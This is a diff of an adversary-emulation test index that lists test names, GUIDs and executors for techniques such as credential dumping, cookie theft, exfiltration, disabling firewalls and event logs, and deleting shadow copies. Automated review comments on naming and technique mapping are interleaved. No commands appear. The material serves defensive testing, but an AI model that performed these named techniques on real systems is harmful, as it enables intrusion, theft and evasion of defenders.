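Review bot: the T1497.001 rename (test 4 to `Detect Virtualization Environment via ioreg`) and new tests 6-8 here mirror the defense-evasion hunk earlier in the file with identical GUIDs, which is correct since the same atomics are indexed under both tactics. Pre-existing but visible in the context lines: T1087.001 tests 6 and 7 are both named `Enumerate users and groups` with different GUIDs, so the index cannot tell them apart; give each a name that states what distinguishes it.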
@@ -243,6 +255,7 @@ discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,12,Port Scan using nmap (Port range),0d5a2b03-3a26-45e4-96ae-89485b4d1f97,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1124,System Time Discovery,3,System Time Discovery in FreeBSD/macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
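Review bot: the new test 12 `Port Scan using nmap (Port range)` spells the tool `nmap` while test 2 is `Port Scan Nmap`; use one spelling across the T1046 rows so name-based searches find both. The `sh` executor matches test 2 and is the right choice for this index.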
@@ -273,5 +286,7 @@ initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing use
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,4,Exfiltrate Data using DNS Queries via dig,a27916da-05f2-4316-a3ee-feec67a437be,bash
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,2,Exfiltrate data with rclone to cloud Storage - AWS S3,a4b74723-5cee-4300-91c3-5e34166909b4,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
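Review bot: the `Exfiltrate data with rclone to cloud Storage - AWS S3` row (T1567.002 test 2) carries a `powershell` executor while every other row in this section is `sh`, `bash` or `manual`; the surrounding rows are macOS tests, so confirm the test is meant to run under PowerShell on that platform rather than the row having been carried over from a Windows listing. Minor: the T1048.002 row joins technique and sub-technique with a hyphen (`Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric ...`) where the T1048.003 row and the rest of the file use a colon.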
@@ -74,6 +74,7 @@ defense-evasion,T1222.001,File and Directory Permissions Modification: Windows F
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,6,SubInAcl Execution,a8568b10-9ab9-4140-a523-1c72e0176924,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,1,Msiexec.exe - Execute Local MSI file with embedded JScript,a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,2,Msiexec.exe - Execute Local MSI file with embedded VBScript,8d73c7b0-c2b1-4ac1-881a-4aa644f76064,command_prompt
defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,3,Msiexec.exe - Execute Local MSI file with an embedded DLL,628fa796-76c5-44c3-93aa-b9d8214fd568,command_prompt
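Review bot: `SubInAcl Execution` (T1222.001 test 6) names the tool but not the permission change it makes, unlike the sibling rows (`attrib - hide file`, `Grant Full Access to folder for Everyone`); naming the action performed with SubInAcl would let a reader tell from the index what the test does.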
@@ -90,6 +91,7 @@ defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,2,I
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Clear PowerShell Session History,22c779cd-9445-4d3e-a136-f75adbf0315f,powershell
defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
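Review bot: the new test 14 `Clear PowerShell Session History` sits beside tests 11 and 12, which spell the name `Powershell`; pick one capitalisation (PowerShell is the product spelling) across the T1070.003 rows so name-based searches hit all of them. Test 12 `Clear Powershell History by Deleting History File` and test 14 both clear history, so the name of 14 should make the distinction explicit (in-memory session history versus the on-disk file, if that is the difference).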
@@ -147,6 +149,9 @@ defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,4,Impai
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,5,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,6,Disable Event Logging with wevtutil,b26a3340-dad7-4360-9176-706269c74103,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,7,Makes Eventlog blind with Phant0m,3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741,command_prompt
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,8,Modify Event Log Channel Access Permissions via Registry - PowerShell,8e81d090-0cd6-4d46-863c-eec11311298f,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,9,Modify Event Log Channel Access Permissions via Registry 2 - PowerShell,85e6eff8-3ed4-4e03-ae50-aa6a404898a5,powershell
defense-evasion,T1562.002,Impair Defenses: Disable Windows Event Logging,10,Modify Event Log Access Permissions via Registry - PowerShell,a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1,powershell
defense-evasion,T1218.002,Signed Binary Proxy Execution: Control Panel,1,Control Panel Items,037e9d8a-9e46-4255-8b33-2ae3b545ca6f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,1,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
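Review bot: tests 8 and 9 (`Modify Event Log Channel Access Permissions via Registry - PowerShell` and `... via Registry 2 - PowerShell`) differ only by a trailing `2`, which tells a reader nothing about what the second variant changes; name the distinguishing element (which channel or which registry value is modified, for instance), as test 10 does by dropping `Channel`.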
@@ -159,6 +164,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,21,
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,22,Blackbit - Disable Windows Firewall using netsh firewall,91f348e6-3760-4997-a93b-2ceee7f254ee,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,23,ESXi - Disable Firewall via Esxcli,bac8a340-be64-4491-a0cc-0985cb227f5a,command_prompt
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,24,Set a firewall rule using New-NetFirewallRule,94be7646-25f6-467e-af23-585fb13000c8,powershell
defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,25,ESXi - Set Firewall to PASS Traffic,a67e8aea-ea7c-4c3b-9b1b-8c2957c3091d,command_prompt
defense-evasion,T1553.003,Subvert Trust Controls: SIP and Trust Provider Hijacking,1,SIP (Subject Interface Package) Hijacking via Custom DLL,e12f5d8d-574a-4e9d-8a84-c0e8b4a8a675,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1553.006,Subvert Trust Controls: Code Signing Policy Modification,1,Code Signing Policy Modification,bb6b51e1-ab92-45b5-aeea-e410d06405f8,command_prompt
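Review bot: #25 "ESXi - Set Firewall to PASS Traffic" does not say what setting it changes or with which tool, unlike #23 "ESXi - Disable Firewall via Esxcli" two rows above it. If the atomic changes the firewall default action, name it that way and name the tool, e.g. "ESXi - Set Firewall Default Action to PASS via Esxcli" (assuming that is what the test does), so the two ESXi firewall rows read as a pair in the index.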
@@ -272,6 +278,10 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,Disable .NET Eve
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,8,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,9,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,10,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd,fdac1f79-b833-4bab-b4a1-11b1ed676a4b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,11,Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell,b42c1f8c-399b-47ae-8fd8-763181395fee,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,12,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd,110b4281-43fe-405f-a184-5d8eaf228ebf,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,13,Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell,4d61779d-be7f-425c-b560-0cafb2522911,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1070,Indicator Removal on Host,2,Indicator Manipulation using FSUtil,96e86706-6afd-45b6-95d6-108d23eaf2e9,powershell
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
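Review bot: the four new T1562.006 rows #10 to #13 are labelled "Via Environment Variable HKCU Registry" / "HKLM Registry" without naming the variable, so the index gives a defender nothing to search for; put the variable name in the test name in the YAML. Also consider whether four rows that differ only by hive (HKCU/HKLM) and shell (Cmd/PowerShell) are better expressed as one or two atomics with input arguments, since otherwise the index and the per-technique docs fill up with near-duplicate entries for a single technique.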
@@ -358,6 +368,10 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper wit
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,51,Delete Microsoft Defender ASR Rules - InTune,eea0a6c2-84e9-4e8c-a242-ac585d28d0d1,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,52,Delete Microsoft Defender ASR Rules - GPO,0e7b8a4b-2ca5-4743-a9f9-96051abb6e50,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,53,AMSI Bypass - Create AMSIEnable Reg Key,728eca7b-0444-4f6f-ac36-437e3d751dc0,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,54,Disable EventLog-Application Auto Logger Session Via Registry - Cmd,653c6e17-14a2-4849-851d-f1c0cc8ea9ab,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,55,Disable EventLog-Application Auto Logger Session Via Registry - PowerShell,da86f239-9bd3-4e85-92ed-4a94ef111a1c,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,56,Disable EventLog-Application ETW Provider Via Registry - Cmd,1cac9b54-810e-495c-8aac-989e0076583b,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,57,Disable EventLog-Application ETW Provider Via Registry - PowerShell,8f907648-1ebf-4276-b0f0-e2678ca474f0,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
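Review bot: #54 to #57 disable the EventLog-Application autologger session and ETW provider via the registry but are filed under T1562.001 (Disable or Modify Tools), while the same kind of change elsewhere in this diff sits under T1562.002 (Disable Windows Event Logging, #8 to #10 modify event log channel permissions via registry) and T1562.006 (Indicator Blocking, #7 to #13 disable .NET ETW via registry). Cutting off the provider and session that feed the Application event log is event-logging impairment rather than tampering with a security tool, so check the technique mapping in the four YAML files before the index is regenerated. The unchanged context also skips from #49 to #51; pre-existing, but worth confirming #50 is a non-Windows test rather than a numbering slip.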
@@ -590,6 +604,7 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
privilege-escalation,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
privilege-escalation,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
privilege-escalation,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
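Review bot: #20 "Add persistence via Windows Context Menu" is mapped to T1547.001 (Registry Run Keys / Startup Folder), but a context menu handler is neither a Run key nor a Startup folder entry; it is a shell handler registered in the registry that fires when a user acts on a file or folder. Check the mapping against the Event Triggered Execution (T1546) sub-techniques before this lands, and name the registry key the test writes in the test name so the row says more than "Windows Context Menu".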
@@ -683,6 +698,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
execution,T1059.010,Command and Scripting Interpreter: AutoHotKey & AutoIT,1,AutoHotKey script execution,7b5d350e-f758-43cc-a761-8e3f6b052a03,powershell
execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
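Review bot: "AutoIt Script Execution" is filed under the parent technique T1059 as test #1, while the row directly above files "AutoHotKey script execution" under T1059.010, whose name in this same index reads "Command and Scripting Interpreter: AutoHotKey & AutoIT". The AutoIt test belongs under T1059.010 as #2; as written the index shows a T1059 parent with a single test whose scope is covered by the sub-technique. Fix the `attack_technique` in the YAML and regenerate rather than editing the CSV.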
@@ -839,6 +855,7 @@ persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Sta
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,17,Modify BootExecute Value,befc2b40-d487-4a5a-8813-c11085fb5672,powershell
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,18,Allowing custom application to execute during new RDP logon session,b051b3c0-66e7-4a81-916d-e6383bd3a669,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,19,Creating Boot Verification Program Key for application execution during successful boot,6e1666d5-3f2b-4b9a-80aa-f011322380d4,command_prompt
persistence,T1547.001,Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder,20,Add persistence via Windows Context Menu,de47f4a0-2acb-416d-9a6b-cee584a4c4d1,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
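Review bot: this #20 row is byte-identical to the one added under privilege-escalation at the same T1547.001 position earlier in the diff, which is expected: the generator emits one row per tactic the technique is tagged with. Nothing to change in the CSV itself, but it means any correction to #20's name or technique mapping has to be made in the YAML so both copies are regenerated together; hand-editing one copy would leave the two tactic sections disagreeing.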
@@ -908,6 +925,7 @@ command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b
command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
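Review bot: #15 "Microsoft App Quick Assist Execution" reads awkwardly; the product is "Quick Assist" and the sibling rows use the "<Product> Execution" form ("Splashtop Execution", "Splashtop Streamer Execution"), so "Microsoft Quick Assist Execution" would match the pattern. A nit, but the index is what people grep.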
@@ -1022,6 +1040,7 @@ credential-access,T1003,OS Credential Dumping,6,Dump Credential Manager using ke
credential-access,T1003,OS Credential Dumping,7,Send NTLM Hash with RPC Test Connection,0b207037-813c-4444-ac3f-b597cf280a67,powershell
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
credential-access,T1539,Steal Web Session Cookie,4,Steal Chrome v127+ cookies via Remote Debugging (Windows),b647f4ee-88de-40ac-9419-f17fac9489a7,powershell
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
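Review bot: T1539 jumps from #2 to #4 in this index with the new "Steal Chrome v127+ cookies via Remote Debugging (Windows)" row. That is fine if #3 is a non-Windows test dropped by the platform filter, but confirm it is not a gap left by a removed or renumbered atomic, since the test number is how the index and the per-technique docs refer to it. The "(Windows)" suffix is consistent with #1 and #2.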
@@ -1180,6 +1199,7 @@ discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attribu
discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
discovery,T1087.001,Account Discovery: Local Account,11,ESXi - Local Account Discovery via ESXCLI,9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c,command_prompt
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
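Review bot: the new row spells the tool "ESXCLI" while T1562.004 #23 earlier in this same diff spells it "Esxcli". The binary is `esxcli`; pick one casing across the ESXi atomics so a search of the index for the tool name finds all of them.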
@@ -1243,6 +1263,8 @@ discovery,T1082,System Information Discovery,35,"Check OS version via ""ver"" co
discovery,T1082,System Information Discovery,36,"Display volume shadow copies with ""vssadmin""",7161b085-816a-491f-bab4-d68e974b7995,command_prompt
discovery,T1082,System Information Discovery,37,Identify System Locale and Regional Settings with PowerShell,ce479c1a-e8fa-42b2-812a-96b0f2f4d28a,command_prompt
discovery,T1082,System Information Discovery,38,Enumerate Available Drives via gdr,c187c9bc-4511-40b3-aa10-487b2c70b6a5,command_prompt
discovery,T1082,System Information Discovery,39,Discover OS Product Name via Registry,be3b5fe3-a575-4fb8-83f6-ad4a68dd5ce7,command_prompt
discovery,T1082,System Information Discovery,40,Discover OS Build Number via Registry,acfcd709-0013-4f1e-b9ee-bc1e7bafaaec,command_prompt
discovery,T1016.002,System Network Configuration Discovery: Wi-Fi Discovery,1,Enumerate Stored Wi-Fi Profiles And Passwords via netsh,53cf1903-0fa7-4177-ab14-f358ae809eec,command_prompt
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Opera Bookmarks on Windows with powershell,faab755e-4299-48ec-8202-fc7885eb6545,powershell
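Review bot: #39 and #40 each read a single registry value and are named only "via Registry"; put the key or value name in the test name so the two rows can be matched against registry-read telemetry without opening the YAML. Separately, the unchanged context row #37 "Identify System Locale and Regional Settings with PowerShell" carries executor `command_prompt`, contradicting its own name; pre-existing, but since the index is regenerated from YAML, fix the executor (or the name) in that atomic.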
@@ -1298,6 +1320,8 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,1,Disco
discovery,T1614.001,System Location Discovery: System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,7,Discover System Language with dism.exe,69f625ba-938f-4900-bdff-82ada3df5d9c,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,8,Discover System Language by Windows API Query,e39b99e9-ce7f-4b24-9c88-0fbad069e6c6,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,9,Discover System Language with WMIC,4758003d-db14-4959-9c0f-9e87558ac69e,command_prompt
discovery,T1614.001,System Location Discovery: System Language Discovery,10,Discover System Language with Powershell,1f23bfe8-36d4-49ce-903a-19a1e8c6631b,powershell
discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
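Review bot: #9 "Discover System Language with WMIC" depends on wmic.exe, which Microsoft has deprecated and now ships only as an optional feature on recent Windows 11 builds, so the atomic needs a prerequisite check for the binary (or a documented fallback) or it will fail on a default install instead of exercising the technique. Minor: "Powershell" in #10 versus "PowerShell" in most other rows of this index.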
@@ -1347,11 +1371,13 @@ discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
discovery,T1124,System Time Discovery,5,System Time with Windows time Command,53ead5db-7098-4111-bb3f-563be390e72e,command_prompt
discovery,T1124,System Time Discovery,6,Discover System Time Zone via Registry,25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47,command_prompt
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1491.001,Defacement: Internal Defacement,3,ESXi - Change Welcome Message on Direct Console User Interface (DCUI),30905f21-34f3-4504-8b4c-f7a5e314b810,command_prompt
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
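Review bot: two unrelated additions land in this hunk, T1124 #6 "Discover System Time Zone via Registry" and T1491.001 #3 "ESXi - Change Welcome Message on Direct Console User Interface (DCUI)". For #6, name the registry key in the test name as suggested for the other "via Registry" rows, and note T1124 now lists #1, #2, #4, #5, #6: confirm #3 is filtered out as non-Windows rather than missing. The DCUI test under Internal Defacement is a reasonable mapping, and spelling out "(DCUI)" in the name is helpful.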
@@ -1361,6 +1387,7 @@ impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11
impact,T1486,Data Encrypted for Impact,10,Akira Ransomware drop Files with .akira Extension and Ransomnote,ab3f793f-2dcc-4da5-9c71-34988307263f,powershell
impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1485,Data Destruction,5,ESXi - Delete VM Snapshots,1207ddff-f25b-41b3-aa0e-7c26d2b546d1,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
